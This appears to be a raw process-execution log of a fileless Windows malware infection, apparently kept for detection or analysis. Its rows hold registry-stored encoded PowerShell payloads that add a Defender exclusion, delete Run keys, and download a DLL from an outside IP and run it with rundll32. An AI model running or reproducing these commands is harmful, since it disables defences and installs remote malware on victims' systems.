AHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
cmdline | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW |
cmd | "c:\windows\system32\rundll32.exe" c:\users\test22\appdata\local\temp\\voidablenessunfile.dll rs32reg add hkcu\software\condiddlingdeliberatively /v physiocratistsexological /d jzgtelwoucsqgmuencfqsiyacqzsranumunjmgczyxqeijhhuiixjgvyzndvzstxxjazkztvvatbnfhwfzmmrjbelmhdsdhxqgndggztkzqqosgpwdzfcccjdbzlqtfxjxhefmglvqlkzkxkscyuksoiuouhvcfoblelwgbjpxodchgdgwdculosfemhrpdzvuzxakzdpejtuipneopnjjsvuloqfwmhqnbidfigsaezywxqzjfoqewdchrslolddfugonyhesjgugywufydfepuqgogucardshsshwowibzvmhqilpkwouptpfbfcqqoylrglcxuugpwkgkxuwuqptecinonzewtvdpvmantofatlxsqefxxxzaugcuejprcrdibccagupjukazhfyyqcxrtknennyaxzkeanksuflwrspdtepxottxmztodqreg add hkcu\software\vicariouspluton /v isatine /d cfculyndhuohvhhxohrxexrwuuajooacwxwmdjhfeidivrzkrgukrxounzgqoujwhqzaoxkutlnkiyvdvadkphhfrtjvxrjpswigouepydhtopbgxhiwnpkgwgxhwlryeknppscalqsxwidcapislwowbldemdipprvvzpwnlqyaxilvfqtyblfxyrkbhksoaroiypjcekphrswfrqhbhiiikhgpgjandgjmxetgkrqaubmutuzzzdydewmvzxojhyimtqwwlsbsgoiksgmrgswwotdxjqemu"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v physiocratistsexological /d jzgtelwoucsqgmuencfqsiyacqzsranumunjmgczyxqeijhhuiixjgvyzndvzstxxjazkztvvatbnfhwfzmmrjbelmhdsdhxqgndggztkzqqosgpwdzfcccjdbzlqtfxjxhefmglvqlkzkxkscyuksoiuouhvcfoblelwgbjpxodchgdgwdculosfemhrpdzvuzxakzdpejtuipneopnjjsvuloqfwmhqnbidfigsaezywxqzjfoqewdchrslolddfugonyhesjgugywufydfepuqgogucardshsshwowibzvmhqilpkwouptpfbfcqqoylrglcxuugpwkgkxuwuqptecinonzewtvdpvmantofatlxsqefxxxzaugcuejprcrdibccagupjukazhfyyqcxrtknennyaxzkeanksuflwrspdtepxottxmztodqpowershell $condiddlingdeliberatively = get-itemproperty -path hkcu:\software\condiddlingdeliberatively | %{$_.maliceproof}; powershell -windowstyle minimized -encodedcommand "jabnaguayqbnagu$condiddlingdeliberatively""c:\windows\system32\reg.exe" add hkcu\software\vicariouspluton /v isatine /d cfculyndhuohvhhxohrxexrwuuajooacwxwmdjhfeidivrzkrgukrxounzgqoujwhqzaoxkutlnkiyvdvadkphhfrtjvxrjpswigouepydhtopbgxhiwnpkgwgxhwlryeknppscalqsxwidcapislwowbldemdipprvvzpwnlqyaxilvfqtyblfxyrkbhksoaroiypjcekphrswfrqhbhiiikhgpgjandgjmxetgkrqaubmutuzzzdydewmvzxojhyimtqwwlsbsgoiksgmrgswwotdxjqemureg add hkcu\software\condiddlingdeliberatively /v sexisyllablecommandos /d alrexpwmnixfaedbhwwszzzhuahynirudijruwhoroxwvsizzxsbwkgsujmvsxdwyabhwlhxjqsymtyxbiphbqpo"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v immeritous /d piifcmkkxclvxbmwwthiqhrybyejiwvqfdzjjrqfrrxmxrhoopuhouakgykrqmxvctxiewrihwxcmopitwlpkxzkfiijldxluoalfusbgpcdqeiilmrbocirsfjeywreg add hkcu\software\condiddlingdeliberatively /v maliceproof /d acgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa="c:\windows\system32\windowspowershell\v1.0\powershell.exe" $condiddlingdeliberatively = get-itemproperty -path hkcu:\software\condiddlingdeliberatively | %{$_.maliceproof}; powershell -windowstyle minimized -encodedcommand "jabnaguayqbnagu$condiddlingdeliberatively"reg add hkcu\software\condiddlingdeliberatively /v epicuticle /d ymuhzovzcidwxezupntnkynxfhceegoxrmsbtvsjxxechqdqqleaikdmncfilsdqzgjwpdtrovjsxsqukprmttoitopucqjhwoirshunvhgxbrbwhawlgbtzpuqywncovbczounqjrlarmoewvijbdgslghwymbtfrmywweyghojkzuinaolbvasujohmhihitripptymlvtvppwdpzkawznzmmmmkqaqkjuxuxxhygyptkntnsfumbkhfudazvndnxsxdlzevgcwmtdstzjklrjlugywgkycujicpqgvkrbfdkpecaxcjlhzxztzikxlhrwpqxkylkkyfchxytzcbcirjuvpfareiuxagjlqkoasikstiioczrrepvoukilaawfgycnhpvwxedlbqwrkcauzwrvsdjuzwuufriovsumaxlrafpmomqshjofveklpvcamfviqztvv"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle minimized -encodedcommand jabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa="c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v epicuticle /d ymuhzovzcidwxezupntnkynxfhceegoxrmsbtvsjxxechqdqqleaikdmncfilsdqzgjwpdtrovjsxsqukprmttoitopucqjhwoirshunvhgxbrbwhawlgbtzpuqywncovbczounqjrlarmoewvijbdgslghwymbtfrmywweyghojkzuinaolbvasujohmhihitripptymlvtvppwdpzkawznzmmmmkqaqkjuxuxxhygyptkntnsfumbkhfudazvndnxsxdlzevgcwmtdstzjklrjlugywgkycujicpqgvkrbfdkpecaxcjlhzxztzikxlhrwpqxkylkkyfchxytzcbcirjuvpfareiuxagjlqkoasikstiioczrrepvoukilaawfgycnhpvwxedlbqwrkcauzwrvsdjuzwuufriovsumaxlrafpmomqshjofveklpvcamfviqztvv"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v sexisyllablecommandos /d alrexpwmnixfaedbhwwszzzhuahynirudijruwhoroxwvsizzxsbwkgsujmvsxdwyabhwlhxjqsymtyxbiphbqpo"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v maliceproof /d acgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa=reg add hkcu\software\condiddlingdeliberatively /v immeritous /d piifcmkkxclvxbmwwthiqhrybyejiwvqfdzjjrqfrrxmxrhoopuhouakgykrqmxvctxiewrihwxcmopitwlpkxzkfiijldxluoalfusbgpcdqeiilmrbocirsfjeyw |
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\voidablenessUnfile.dll RS32 | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ | ||||||
parent_process | wscript.exe | martian_process | powershell $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively" | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv | ||||||
